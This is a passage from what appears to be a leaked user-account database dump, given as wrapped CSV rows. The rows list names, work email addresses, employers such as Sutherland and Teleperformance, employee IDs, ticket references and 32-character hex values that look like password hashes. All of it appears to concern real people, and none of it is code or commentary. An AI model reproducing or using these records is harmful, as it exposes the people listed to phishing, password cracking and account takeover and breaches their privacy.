Kalyanasundaram,Lokabiraman,NULL,NULL,NULL
1c0-4018-9574-69db20eb82f5,<blank>,<blank>,Lokendra_Jain@SUTH.COM,Sutherland,96d
d8f5ddc2b08a4e6253c68460d3652,Jain,<blank>,Lokendra_Jain,Lokendra,NULL,NULL,NULL
f9e3-4914-8461-6e737239731f,<blank>,<blank>,aklimpe@symantec.teleperformance.gr,
CT - 12/09/2012 - CRQ000000801164,b9b6d54dcc4bf0a2ea43ef49d62bd348,Klimpke,<blan
k>,229986,Alex,NULL,NULL,NULL
e75-4c6f-bac4-3830871aae6c,<blank>,<blank>,Lynford_Sheppard1@SUTH.COM,Sutherland
,50ca9f9373385853866fe5d9168fe8c4,Sheppard,<blank>,Lynford_Sheppard,Lynford,NULL
,NULL,NULL
3a8-4a64-9a17-b1ebfd6af5f4,<blank>,<blank>,madan_b@suth.com,Sutherland,75303bfb2
eefcac769df3776d2130292,B,<blank>,Madan_B,Madan,NULL,NULL,NULL
06d-4705-bf00-da73db510b68,<blank>,<blank>,Madhu_Vallatuthara@suth.com,Sutherlan
d,17eaa54857aef840bb54cbd020887d07,Vallatuthara,<blank>,Madhu_Vallatuthara,Madhu
,NULL,NULL,NULL
1fb-4910-b74a-147e2e74e689,<blank>,<blank>,Madhumitha_R@SUTH.COM,Sutherland,f75a
0881fc75a3929900a9991b6759a8,Raveendran,<blank>,Madhumitha_Raveendran,Madhumitha
,NULL,NULL,NULL
033a-4da2-b484-1b7cdfe7f211,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716163,dca597330b04770b772070cde6c842b4,Garferio,<blank>,227446, Honey Edlyn ,NU
LL,NULL,NULL
138-4b3e-962b-105ee2fb0d62,<blank>,<blank>,MahaboobKhan_J@SUTH.COM,Sutherland,9e
27e4f43f9420ba5079fc16a97840f4,Khan,<blank>,Mahaboob_Khan_J,Mahaboob,NULL,NULL,N
ULL
490-4fc1-8d4b-25ddd45d49f1,<blank>,<blank>,mahalakshmi_srinivasan@suth.com,Suthe
rland,b2c00ee072106159fcf21d4a33d3f4f6,Hembujaralli,<blank>,Mahalakshmi_Hembujar
alli_Srinivasan,Mahalakshmi,NULL,NULL,NULL
a25-42fd-b150-d4b453409e6b,<blank>,<blank>,Mahesh_V2@SUTH.COM,Sutherland,13db524
63183fbaa6a4d6591fdb5ec6f,Pai,<blank>,Mahesh_Pai_V,Mahesh,NULL,NULL,NULL
b9d-49d5-8ec7-7bf62bf9996b,<blank>,<blank>,Mahesh_Rajagopal@suth.com,Sutherland,
c4f182252bf62fed6f4eb1177aeb3ff7,Rajagopal,<blank>,Mahesh_Rajagopal,Mahesh,NULL,
NULL,NULL
ded-48c5-9ed2-d143c5612daa,<blank>,<blank>,MaheshRam_G@SUTH.COM,Sutherland,69452
4c86daca88703efd3997355b392,Ram,<blank>,Mahesh_Ram_G,Mahesh,NULL,NULL,NULL
e33-4381-8a1d-1dbe8658cdad,<blank>,<blank>,Mahesh_Rathi@SUTH.COM,Sutherland,abef
df413403df1d0137ce59bc60ff3c,Sagar,<blank>,Mahesh_Sagar_Rathi,Mahesh,NULL,NULL,N
ULL
670-4a25-ae10-0e523086eb37,<blank>,<blank>,Mahesh_T1@SUTH.COM,Sutherland,72e4845
55ddcbfafe392b5889a69e886,T,<blank>,Mahesh_T,Mahesh,NULL,NULL,NULL
04ae-4c70-aa3d-4b2f8c60f879,CRQ000000734330--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,bb1d88bd187d8bbdf98fa3e2152c72ec,Badai,<blank>,227951
,Akil,NULL,NULL,NULL
9c6-4534-83f5-1e0fd98adab5,<blank>,<blank>,Mahima_Ponnappan@SUTH.COM,Sutherland,
291b0ba1f7170e9f6e804a5d3c2dd7c2,Ponnappan,<blank>,Mahima_Ponnappan,Mahima,NULL,
NULL,NULL
ddc1-499e-aecd-8d6b36db0194,<blank>,<blank>,mbieganska@symantec.teleperformance.
gr,CT - 12/09/2012 - CRQ000000801271,58732b4a9dfe3d805d9ffe12f934af01,Bieganska,
<blank>,229990,Magdalena,NULL,NULL,NULL
e1a-42b8-99cb-76b7c614cde4,<blank>,<blank>,Malini_Jayakumar@SUTH.COM,Sutherland,
ce2695a18f62804a24d429b53ddd87cb,Jayakumar,<blank>,Malini_Jayakumar,Malini,NULL,
NULL,NULL
14b-4358-bc6d-24299e9742a6,<blank>,2633251,tools_id@symantec.suth.com,Sutherland
,755c91107f7e68012b70e687376264b1,Avinash,<blank>,Mandar_Avinash_Muranjan,Mandar
,NULL,NULL,NULL
506-45ad-9718-dbc09f9efcba,<blank>,<blank>,Mandar_Kerkar@suth.com,Sutherland,46c
772721c8281ed9145045a5b0059b0,Prakash,<blank>,Mandar_Prakash_Kerkar,Mandar,NULL,
NULL,NULL
7d5a-4473-8f31-c49dd19b4d03,CRQ000000734357--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,e076bba182d437c9473b34766b22c783,Bollavarapu,<blank>,
227958,Yesuratnam,NULL,NULL,NULL
14b-42ce-8f3f-15aacf1697a5,<blank>,<blank>,Manish_Ramanand1@SUTH.COM,Sutherland,
59cdc077390fbf0250cd7c38753f7ed3,Ramanand,<blank>,Manish_Ramanand,Manish,NULL,NU
LL,NULL
6cb-45e6-b9b5-afdf6925ce95,<blank>,<blank>,Manoge_George@SUTH.COM,Sutherland,5db
3c50880068acc96801404a22b8f88,Sebastian,<blank>,Manoge_Sebastian_George,Manoge,N
ULL,NULL,NULL
f91-4397-9c59-4971331bcb91,<blank>,<blank>,ManishChristo_M@SUTH.COM,Sutherland,b
60a24e20ffafee63c7c26a9c4449378,Christo,<blank>,Manish_Christo_M,Manish,NULL,NUL
L,NULL
49b-47e3-b2c5-4abc1d03e148,<blank>,<blank>,Manju_Sivaram@SUTH.COM,Sutherland,c38
9410cd7c1128dd452a9ebbcb4dece,S,<blank>,Manju_S_Sivaram,Manju,NULL,NULL,NULL
f5d-451b-9264-1a4cad8a37cf,<blank>,<blank>,ManojChacko_Jacob@SUTH.COM,Sutherland
,913623bd343bc21da5030ec6b403a190,Chacko,<blank>,Manoj_Chacko_Jacob,Manoj,NULL,N
ULL,NULL
e03-430a-81c8-1e7c0c49c027,<blank>,<blank>,GManoj@suth.com,Sutherland,9f50277046
a0eeb9e3ceacbdb2f1919e,Gour,<blank>,Manoj_Gour,Manoj,NULL,NULL,NULL
31bb-4843-bedd-d0ca16f3d5c0,CRQ000000624212--vmd--11/04/2012,<blank>,ekarapidaki
@symantec.teleperformance.gr,Teleperformance,dd7d461cac95e9e6e778063b01de5cb9,Ka
rapidaki,<blank>,223746,Elpida,NULL,NULL,NULL
ded5-4631-8dbf-cb77864c168d,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,decc97301a860c53ef40abe196839293,George,<blank>,jeeva_george_cc,Jeeva ,NU
LL,NULL,NULL
056c-48fa-9ac4-82724b4d657e,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,b76745487aca399abcc063fae624ebbc,Saiza,<blank>,don_saiza_cc,Don ,NULL,NUL
L,NULL
508-42b1-bca1-718b34f2c63d,<blank>,<blank>,Manoj_Vasudevan@SUTH.COM,Sutherland,8
b1c9f7174a90324f681dc9d1d948806,Vasudevan,<blank>,Manoj_Vasudevan,Manoj,NULL,NUL
L,NULL
d74-4b0d-b910-9687ba62c063,<blank>,<blank>,Manu_Jose@SUTH.COM,Sutherland,69c867e
5dbe11e9f3d5ae5ad65a8d68e,Jose,<blank>,Manu_Jose,Manu,NULL,NULL,NULL
2042-453c-aa3b-9ec1a3605a2b,SRB 24.08.2010,INC000000249136,Tools_ID@Symantec.Sut
h.Com,Sutherland,c1b2df6766136734fd6e655af3904815,Gangiredla,<blank>,105244,Vams
i,NULL,NULL,NULL
863-4834-8da1-d1d38e87a9de,<blank>,<blank>,Mario_Peter@SUTH.COM,Sutherland,e8950
d4d6a05cc09a32aa706f35be945,Kiran,<blank>,Mario_Kiran_Peter,Mario,NULL,NULL,NULL
99a-4782-8bea-fa9a2e4d38b0,<blank>,<blank>,MarlonThomas_C@SUTH.COM,Sutherland,56
8996e2815e5ffc8da27ec5c84ea859,Thomas,<blank>,Marlon_Thomas_C,Marlon,NULL,NULL,N
ULL
a8e-4ec8-b80c-b3d5c4c8f555,<blank>,<blank>,Marudha_R@suth.com,Sutherland,45b6e96
d30aeeb150da9e4fdfe7ddaa1,Mani,<blank>,Marudha_Mani_Ramalingam,Marudha,NULL,NULL
,NULL
5e0d-43e2-a88a-437707bcf8cf,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
734354 - PR - 17th July 2012,65e029e4f58f8afe43cfaf635a1e44b9,Guarin,<blank>,228
058,Maricris DelaCruz ,NULL,NULL,NULL
085-44fd-84b8-30d71456657a,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,Ipcdoctor.c
o.kr,ee0c35cd4d720f02cb64e8ac00858dc0,Matsumoto,<blank>,091759,Nobuaki ,NULL,NUL
L,NULL
bda-4ec4-9e63-a4689610ebfb,<blank>,<blank>,Mary_Mundargi@SUTH.COM,Sutherland,50d
fae2b9d5dce004c4bff801d5377f3,Devputra,<blank>,Mary_Devputra_Mundargi,Mary,NULL,
NULL,NULL
c951-449b-8ea2-86c8daae2bed,CRQ000000624245--vmd--11/04/2012,<blank>,kparkkonen@
symantec.teleperformance.gr,Teleperformance,cebff43d4c1cdb9c3520734f788f1df4,Par
kkonen,<blank>,223757,Karita,NULL,NULL,NULL
24f-4513-b517-46765e45cab6,<blank>,<blank>,Mary_Vandana@SUTH.COM,Sutherland,f0d5
972a191d9af661f1b6ce7b2a453a,Vandana,<blank>,Mary_Vandana,Mary,NULL,NULL,NULL
232-49ae-bb4f-38d650c04799,<blank>,<blank>,Mayur_Malusare@SUTH.COM,Sutherland,4a
f7274bf44bd49c63c5ef76676c4175,Chandrakant,<blank>,Mayur_Chandrakant_Malusare,Ma
yur,NULL,NULL,NULL
f28-43e9-bb51-41207e68b66b,<blank>,<blank>,Mcallen_Selvaraj@suth.com,Sutherland,
e4683b0f4775c808010b38dfb747ba08,Trevor,<blank>,McAllen_Trevor_Selvaraj,McAllen,
NULL,NULL,NULL
e16e-4b42-b855-03249322fb87,CRQ000000641916--vmd--27/04/2012,000-000,afroz_ak@su
th.com,Sutherland,e9ac6830c31bb52fe087c60da95f8063,Ak,<blank>,224251,Afroz,NULL,
NULL,NULL
57c4-4f17-94d3-255cf13f91cc,SSS 12/01/10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,b856b8901d42ce260026cb54c24488bc,Bhattacharjee,<blank>,098419,Sreya,NULL,N
ULL,NULL
a33-4da5-90ee-4b981f4256a7,<blank>,<blank>,Meera_Lalu@SUTH.COM,Sutherland,fdb4d1
08469368a898478ecd0b87f17d,Lalu,<blank>,Meera_Lalu,Meera,NULL,NULL,NULL
db9-41a6-a525-1781b3748d15,<blank>,<blank>,MeghaKantilal_Rathod@SUTH.COM,Sutherl
and,a519144a874c97648892eff25aecc03e,Kantilal,<blank>,Megha_Kantilal_Rathod,Megh
a,NULL,NULL,NULL
c8e-4160-8afb-b20a874b18c9,<blank>,<blank>,Megha_Kumar@suth.com,Sutherland,822ec
83aa882c9f43a93c9850e3997d2,Kumar,<blank>,Megha_Kumar,Megha,NULL,NULL,NULL
85f-44b8-8007-b3f3955dc47e,<blank>,<blank>,Merzina_Radiowala@suth.com,Sutherland
,27d214df97236594ec268667d2982855,Sultan,<blank>,Merzina_Sultan_Radiowala,Merzin
a,NULL,NULL,NULL
0070-49b1-8dca-87a433cd3acd,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716153,25eb2e0f7af45358ea8babe2a2ee66e5,Nistal,<blank>,227445,Vincent Paul ,NULL
,NULL,NULL
c35-4eab-9435-d9fdbd7aed74,<blank>,<blank>,Mehrin_Nishad@SUTH.COM,Sutherland,844
1da1a4524c4be0c85111a02255292,Nishad,<blank>,Mehrin_Nishad,Mehrin,NULL,NULL,NULL
171-4044-9e14-8ed35f2ec0fd,<blank>,<blank>,Mervyn_Dsouza@suth.com,Sutherland,c8f
e307d931432be1cdbf97e8d3eafd8,Joseph,<blank>,Mervyn_Joseph_Dsouza,Mervyn,NULL,NU
LL,NULL
7ed-4335-8c4b-bdef366c497a,<blank>,<blank>,Michael_Antony@SUTH.COM,Sutherland,ce
3478ab262af91920889d634efec12a,Antony,<blank>,Michael_Antony,Michael,NULL,NULL,N
ULL
a5e-4fd5-b97e-6cfe1a0dd9d5,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,2704235cf60594d5422ef0605e3ebdc6,Nadar,<blank>,Micheal_Nadar,Micheal,NULL,NULL,
NULL
2d63-4412-99b3-1e42b5e286f6,<blank>,<blank>,ejeng@symantec.teleperformance.gr,CT
- 12/09/2012 - CRQ000000801277,3a40eeb406f49cf5d24f89d075c20e84,Jeng,<blank>,22
9992,Ebrima,NULL,NULL,NULL
0e3a-4f49-af8b-bed4a376bedc,CRQ000000622776 SP 10 April 2012,999-999-9999,Pharez
_Edwards@symantec.suth.com,Sutherland,6165aae31702a57d892170f4c9465391,Edwards,<
blank>,223569,Pharez,NULL,NULL,NULL
e78-4d8f-9f8c-d30995443c64,<blank>,<blank>,Miken_Ajmera@SUTH.COM,Sutherland,2834
c9ad3f3ceb9d9d5fef5f3a8f9aa1,Pankaj,<blank>,Miken_Pankaj_Ajmera,Miken,NULL,NULL,
NULL
085-4e63-b794-94c8fe2bfe0c,<blank>,<blank>,Minesh_M@SUTH.COM,Sutherland,36b085fd
36c8c9e018edb4be9d014b24,Happy,<blank>,Minesh_Happy_M,Minesh,NULL,NULL,NULL
14c2-4dcc-b3b7-278c109436fc,CRQ000000622796 SP 10 April 2012,999-999-9999,Debopr
iya_chowdhury@symantec.suth.com,Sutherland,3069162cd2aa58cead4eecc9bc7eb871,chow
dhury,<blank>,223570,Debopriya,NULL,NULL,NULL
208-4d18-b73e-be1d07a7be9e,<blank>,<blank>,minty_narang@suth.com,Sutherland,4b33
cc0d4c47a66a8af657b62525a873,Ashok,<blank>,Minty_Ashok_Narang,Minty,NULL,NULL,NU
LL
250-4076-89dd-06eaf2a57f18,<blank>,<blank>,Minu_Rajagobi@SUTH.COM,Sutherland,57a
d5bb311c009b958966148ee7dbb39,Rajagobi,<blank>,Minu_Rajagobi,Minu,NULL,NULL,NULL
c84d-4cf4-a52f-0b9848f2c86e,CRQ000000653477 SP 8 May 2012,000-0000,ajeet_revanka
r@symantec.suth.com,Sutherland,d8006c0ddcb90f1fb4305efa40f47c92,Revankar,<blank>
,224433,Ajeet,NULL,NULL,NULL
2d3-436b-9e1f-8a2021f9ad60,<blank>,<blank>,Mittal_Vyas@SUTH.COM,Sutherland,eb64b
7571e439b4cf2a8237d0dcdb650,Vikram,<blank>,Mittal_Vikram_Vyas,Mittal,NULL,NULL,N
ULL
71a-4e0b-8d14-70ebbc3d2ba1,<blank>,<blank>,MohamedIbrahim_B@SUTH.COM,Sutherland,
8d2b4d66e5ab380566056656d24ea9b7,Ibrahim,<blank>,Mohamed_Ibrahim_B,Mohamed,NULL,
NULL,NULL
f29-4652-952d-a025d2eb8c25,<blank>,<blank>,MohamedKhadeerAhmed_MdK@SUTH.COM,Suth
erland,19b2affeb9487145f7871904ff53f463,Khadeer,<blank>,Mohamed_Khadeer_Ahmed_Md
_K,Mohamed,NULL,NULL,NULL
12b-4f52-9cbf-1d8597f34917,<blank>,<blank>,MohamedMuneer_M@SUTH.COM,Sutherland,5
137190641229b0a7f68d69caf016993,Muneer,<blank>,Mohamed_Muneer_M,Mohamed,NULL,NUL
L,NULL
b5d-4200-98e8-4cec695d9eee,<blank>,<blank>,Mohammad_Patel@SUTH.COM,Sutherland,e7
efecbc07c8ed2139ac5c227bbae083,Abid,<blank>,Mohammad_Abid_Patel,Mohammad,NULL,NU
LL,NULL
299-48de-a5ad-2dd5b954ea24,<blank>,<blank>,MohammedAyyubBaig_S@SUTH.COM,Sutherla
nd,a0e99cc7e25cacc960c9dd4f4467b05d,Ayyub,<blank>,Mohammed_Ayyub_Baig_S,Mohammed
,NULL,NULL,NULL
9c4-4db4-8707-e4f1ae6ffd0e,<blank>,<blank>,MohammedHussain_M@SUTH.COM,Sutherland
,66639ec690f110811d51bc9b1c349ae5,Hussain,<blank>,Mohammed_Hussain_M,Mohammed,NU
LL,NULL,NULL
497-417f-a5ea-fa1946d9a8f0,<blank>,<blank>,Mohammed_B@SUTH.COM,Sutherland,7f1624
667ded83d87852bcc1a4e4a94c,Naseem,<blank>,Mohammed_Naseem_Moosa,Mohammed,NULL,NU
LL,NULL
fc5-48d4-8506-33aa622a7751,WS 19-07-2010,INC213497,MohammedRiyaz_Mythunni@suth.c
om,Sutherland,a591e2a1b0d9307ae61fa73c25e82f44,Riyaz,<blank>,Mohammed_Riyaz_Myth
unni,Mohammed,NULL,NULL,NULL
f2b-415a-b5d6-f1c95469ab32,<blank>,<blank>,Mohammed_Sarjun@SUTH.COM,Sutherland,f
be1f3f8730c74bfcf652d6ed54524e4,Sarjun,<blank>,Mohammed_Sarjun,Mohammed,NULL,NUL
L,NULL
fdb-4126-b864-34e06ec705c0,<blank>,<blank>,Mohammed_MI@SUTH.COM,Sutherland,0da1a
291533a3a9316d9cb606782e64d,Yaseen,<blank>,Mohammed_Yaseen_M_I,Mohammed,NULL,NUL
L,NULL
060-456c-beb4-c518c89d3f2c,<blank>,<blank>,Mohan_T@SUTH.COM,Sutherland,c12fb9786
0d013e595539cc594d1cc73,Theerkanandan,<blank>,Mohan_Theerkanandan,Mohan,NULL,NUL
L,NULL
add-4fb4-88bd-a697181a95a8,<blank>,<blank>,MohdNadeem_Obaidi@SUTH.COM,Sutherland
,c7dfb384e7ed4137f88c74cf5f78f0f3,Nadeem,<blank>,Mohd_Nadeem_Akhtar_Obaidi,Mohd,
NULL,NULL,NULL
d93-4458-a467-91faeb7bda82,<blank>,<blank>,Mohit_Wadhwa@SUTH.COM,Sutherland,d0a7
2d556c856cb321ae0412c44dbd02,Haresh,<blank>,Mohit_Haresh_Wadhwa,Mohit,NULL,NULL,
NULL
62e-4633-bbd3-cad16d5cbe6a,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,cb6750d5a6a063f32de0f3debf7d1788,Mohd.,<blank>,Mohsin_Mohd._Salim_Ghare,Mohsin,
NULL,NULL,NULL
bd2-47d8-8055-228217cbe598,<blank>,<blank>,Mona_Khan@SUTH.COM,Sutherland,1481e80
9e476b717bf3f08da4c62efe3,Khan,<blank>,Mona_Khan,Mona,NULL,NULL,NULL
579-4099-bd33-3f13dfb079c7,<blank>,091320,mike_pan@symantec.com,Symantec,92f7678
52f2277e6a56f9b23d4f8469e,Lin,<blank>,091320,Justin,NULL,NULL,NULL
b6a9-41a3-9e06-a241e2074483,"CRQ000000829992 CLNP Oct 08,2012",000-0000,manolito
_mendoza@symantec.com,Symantec,17112f7f5932524105ea78d9f36ec293,Mendoza,<blank>,
230589,Manolito,NULL,NULL,NULL
e11-4cd6-be75-493562a5b789,<blank>,<blank>,Mohamed_Latheaf@SUTH.COM,Sutherland,7
d7bfacd5ec522c840a8d77e22df5018,Abdul,<blank>,Mohamed_Abdul_Latheef,Mohamed,NULL
,NULL,NULL
41d5-4755-a001-1395225f5099,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,6f099a4e6accd15a569a6b33b835b394,Izadyar,<blank>,075625,
Ramin Shapour,NULL,NULL,NULL
7a0-4898-b8aa-04f117c1ebff,<blank>,<blank>,MohamedMubeen_Ismail@SUTH.COM,Sutherl
and,7a82fe8f10029bdc8e56c0a944a8fb83,Mubeen,<blank>,Mohamed_Mubeen_Ismail,Mohame
d,NULL,NULL,NULL
cfd-4117-ac1e-1a1d52b59634,<blank>,<blank>,MohamedMustafa_A@SUTH.COM,Sutherland,
6ca93f39df737f6ca5b296dd02cd62f6,Mustafa,<blank>,Mohamed_Mustafa_A,Mohamed,NULL,
NULL,NULL
db9-4f8d-bcb0-16d4e60a1a3e,<blank>,2614953,Mohamed_R@SUTH.COM,Sutherland,5e81b65
b4ec2c6fe13662ee0941bf2ff,Shaly,<blank>,Mohamed_Shaly_Khan_Razakhan,Mohamed,NULL
,NULL,NULL
a67-4aec-bd32-d89686301afb,<blank>,<blank>,MohammadIrshadBaig_I@SUTH.COM,Sutherl
and,5a7e3cc6cc12a06020fbf871ebbefa32,Irshad,<blank>,Mohammad_Irshad_Baig_I,Moham
mad,NULL,NULL,NULL
8c8-4321-a6f3-3ac0604215d9,<blank>,<blank>,MohammedFami_Riyad@symantec.suth.com,
Sutherland,06ab6db6832ae1cd5cda4b0ac7229dda,Fami,<blank>,Mohammed_Fami_Riyad_M,M
ohammed,NULL,NULL,NULL
ffc-4870-81c9-02c788111657,<blank>,<blank>,Mohd_Farooqui@SUTH.COM,Sutherland,643
8db75d132111bdafa0e6519715349,Asad,<blank>,Mohd_Asad_Farooqui,Mohd,NULL,NULL,NUL
L
2de-44f2-aa67-dbe0d3917607,<blank>,<blank>,MohdRizwan_P@SUTH.COM,Sutherland,db60
76b0c1774be37c3ea083ee0114b4,Rizwan,<blank>,Mohd_Rizwan_P,Mohd,NULL,NULL,NULL
84b-42fb-b3c9-6b558c8cdb10,<blank>,<blank>,MoheshPrasanna_J@SUTH.COM,Sutherland,
a230a6564ca4ebb1a74abb53575a7a87,Prasanna,<blank>,Mohesh_Prasanna_J,Mohesh,NULL,
NULL,NULL
dfb-4fe8-a904-4e561c3ef130,<blank>,<blank>,MohmmedAyub_Hussain@SUTH.COM,Sutherla
nd,799d23fa8a32d500083fa8bb439c97fb,Ayub,<blank>,Mohmmed_Ayub_Hussain,Mohmmed,NU
LL,NULL,NULL
cbc-4de7-8ead-029274ff887e,<blank>,<blank>,momi_sharma@suth.com,Sutherland,e93ba
149ddf6df44ced8339a5ee4d68a,Bipul,<blank>,Momi_Bipul_Sharma,Momi,NULL,NULL,NULL
dae-4dda-a13a-7e4aa8aba1a7,<blank>,<blank>,Mona_Raj@SUTH.COM,Sutherland,5b6b57a8
8317fba157d11de00d06347a,Raj,<blank>,Mona_Raj,Mona,NULL,NULL,NULL
7e5-41f3-a480-4aa5916d0d9f,<blank>,<blank>,Monesh_Pahuja@SUTH.COM,Sutherland,32e
87fdae7e3b27919e86c026e92fe82,Surendra,<blank>,Monesh_Surendra_Pahuja,Monesh,NUL
L,NULL,NULL
2803-4d10-85fa-2fc7857a8b55,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,96962bd8ecdf6f59754d12fd4d43ab47,Ved,<blank>,075626,Hema
nt Jitendra,NULL,NULL,NULL
076-4ab4-89c6-618cdda8d492,<blank>,<blank>,MunibGaurishankar_Gupta@SUTH.COM,Suth
erland,e5632fc9fdc7fac9d7356c41befd43b7,Gaurishankar,<blank>,Munib_Gaurishankar_
Gupta,Munib,NULL,NULL,NULL
e7af-4afa-b6c6-985a231b5431,<blank>,2626962,tools_id@symantec.suth.com,sutherlan
d,b3b10082fda9f9470dfee6ed9b736bd3,Samuel,<blank>,087396,Sini ,NULL,NULL,NULL
0212-429b-a797-cb296256a6d0,"CRQ000000830002 CLNP Oct 08,2012",000-0000,joffrey_
torda@symantec.com,Symantec,beb49a5b8c8d4a3c03383a71d1c3de65,Torda,<blank>,23059
4,Joffrey,NULL,NULL,NULL
6628-4c5e-8099-728a3691c839,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,89a937d1f75b1a05daef7da8024a1685,Kumar,<blank>,114955,S
antosh,NULL,NULL,NULL
c51-4326-b12f-2a4ce887e083,<blank>,<blank>,Myron_Coutinho@SUTH.COM,Sutherland,36
d187506024c8c9d4227f7cd663ab8e,Darren,<blank>,Myron_Darren_Coutinho,Myron,NULL,N
ULL,NULL
daf-4347-83c3-a2aa7e84ba9e,<blank>,<blank>,NadeemParvez_AK@SUTH.COM,Sutherland,2
a241f7471c91c9adaea8a428719006e,Parvez,<blank>,Nadeem_Parvez_A_K,Nadeem,NULL,NUL
L,NULL
f0e-45aa-8397-762cba56c2cc,<blank>,<blank>,Naga_P@suth.com,Sutherland,d35ea7e57c
8c6dbc5177c5ae68566fe9,Poornima,<blank>,Naga_Poornima,Naga,NULL,NULL,NULL
65f-4c50-b812-d5bfe278697f,<blank>,<blank>,NaveenCherian_Palathinkal@SUTH.COM,Su
therland,2159309ed1c63f68f5ac69cb3d86a320,Cherian,<blank>,Naveen_Cherian_Palathi
nkal,Naveen,NULL,NULL,NULL
632-4082-923c-f9bd57be2a75,<blank>,<blank>,Naveen_M@SUTH.COM,Sutherland,49ec7c96
923737056006de8fd03730d9,M,<blank>,Naveen_M,Naveen,NULL,NULL,NULL
bae-4050-a875-01f88e6022b4,<blank>,<blank>,Naveen_Thomas@SUTH.COM,Sutherland,3eb
1cad873ca73172f9a8b2c4674648d,Thomas,<blank>,Naveen_Thomas,Naveen,NULL,NULL,NULL
bd0-4109-bb77-0da84daa446a,<blank>,<blank>,MohammedLoqman_A@SUTH.COM,Sutherland,
c6fa3a4eb0f3412dbc91b53943c12312,Loqman,<blank>,Mohammed_Loqman_A,Mohammed,NULL,
NULL,NULL
125-40a1-a0c7-d228d099e6ee,<blank>,<blank>,MohammedRafiullah_E@SUTH.COM,Sutherla
nd,22e43784f85ddd5b8416afdd3ca10535,Rafiullah,<blank>,Mohammed_Rafiullah_Mohamme
d_Ebrahim,Mohammed,NULL,NULL,NULL
51b-4c3e-b474-74b9a505dfab,<blank>,85673,Tools_id@symantec.suth.com,Sutherland G
lobal Services,457cbe81d449837105e0503836bfc040,Brohart,<blank>,harold_brohart,H
arold,NULL,NULL,NULL
38d-4f33-a70f-f7d8ec48f726,<blank>,<blank>,MohammedShuyab_T@SUTH.COM,Sutherland,
fcd9f7e9015485d2c6c6fefbe3f77fb9,Shuyab,<blank>,Mohammed_Shuyab_T,Mohammed,NULL,
NULL,NULL
b03-4287-8dd9-d99b5f6d9cbd,<blank>,<blank>,MohanKumar_B@SUTH.COM,Sutherland,0a16
779534c54e1b3faa63e293dec48a,Kumar,<blank>,Mohan_Kumar_B,Mohan,NULL,NULL,NULL
72cd-46ff-bb57-e83cff543cd0,CRQ000000204567 - PR - 2/18/2011,<blank>,Vamsi_Krish
na@symantec.com,<blank>,219dc198ec85df65ed0c8278216a189b,Krishna,<blank>,112995,
Vamsi,NULL,NULL,NULL
9ed-460a-9c47-eb61ea8cecdb,<blank>,<blank>,Mohan_Pandurangan@suth.com,Sutherland
,c5afe7ce927e0a918d67f30b59a76898,Pandurangan,<blank>,Mohan_Pandurangan,Mohan,NU
LL,NULL,NULL
707-4bb7-8607-d7e30fa6e24b,<blank>,<blank>,Mohan_Malla@suth.com,Sutherland,1b925
fcaaaf82d70e1012539cb3f329e,Santhosh,<blank>,Mohan_Santhosh_Malla,Mohan,NULL,NUL
L,NULL
1df-4831-95d2-65936703df54,<blank>,<blank>,MudhassirAli_G@SUTH.COM,Sutherland,89
eb4c2a3aefb80af305d46e9a9cfe1c,Ali,<blank>,Mudhassir_Ali_G,Mudhassir,NULL,NULL,N
ULL
617-4533-915f-c0b1e49487ba,<blank>,<blank>,Muhil_R@SUTH.COM,Sutherland,a74b503f6
8caff7252a83a62b7893967,R,<blank>,Muhil_R,Muhil,NULL,NULL,NULL
f0e-4497-8fd2-af8938b0e505,<blank>,<blank>,Munish_Tiwari@SUTH.COM,Sutherland,cd6
d2b925144ba1ea50a0a0f10432aaf,Ashok,<blank>,Munish_Ashok_Tiwari,Munish,NULL,NULL
,NULL
bef-4fac-98b3-46d420d0c6c3,<blank>,<blank>,MuraliKrishna_D@SUTH.COM,Sutherland,0
65022a0a21780d5edaba3e5bd9c6188,Krishna,<blank>,Murali_Krishna_D,Murali,NULL,NUL
L,NULL
a888-4d62-8e9a-5afed04d56e9,CRQ000000653462 SP 8 May 2012,000-0000,Kamlesh_Pandi
t@symantec.suth.com,Sutherland,3ce4a6eb7011466c8dda407ed858e374,Pandit,<blank>,2
24426,Kamlesh,NULL,NULL,NULL
634b-49b2-9eed-9785990a082c,<blank>,<blank>,Sharmaneshara_Cajayo@SPI.COM,PM - 6/
14/2012 - CRQ000000694438,27efb7af36f3218737e1e9b71b38595f,Cajayon,<blank>,22670
2,Sharmane Shara,NULL,NULL,NULL
583-442d-b34c-85a4c6ab1360,<blank>,<blank>,Mushtaq@suth.com,Sutherland,996057bd4
452a7569a562df9e87ad708,Ahamed,<blank>,Mushtaq_Ahamed_Kunjan_Abdullah_Basha,Mush
taq,NULL,NULL,NULL
d73-4f03-aeef-de2184c913f2,<blank>,<blank>,Mussa_Bhat@SUTH.COM,Sutherland,0b877e
070966cc0eb6ea965f0cd6c9f7,Amin,<blank>,Mussa_Amin_Bhat,Mussa,NULL,NULL,NULL
2bd-4fbc-a003-914d917250de,<blank>,<blank>,MuthuGanesh_A@SUTH.COM,Sutherland,1ba
805a7ab0b8fa185112efcc8738f8c,Ganesh,<blank>,Muthu_Ganesh_A,Muthu,NULL,NULL,NULL
c6d-42a5-9c2e-6a29b9119d9b,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,56d7eb361ddafb29e59c7b0c41c69367,Kumar,<blank>,Muthu_Kumar_Palaniappan,Muthu,NU
LL,NULL,NULL
085b-412c-998a-cc4be4f1fee4,<blank>,<blank>,Ralnoemi_Mayuga@SPI.COM,PM - 6/14/20
12 - CRQ000000694464,a52bcdac15a2be9b0b89ce01aab6e722,Mayuga,<blank>,226708,Ral
Noemi,NULL,NULL,NULL
1c7-4d9e-bcf8-b5ed555d3da0,<blank>,<blank>,Najib_Shriwerdhankar@SUTH.COM,Sutherl
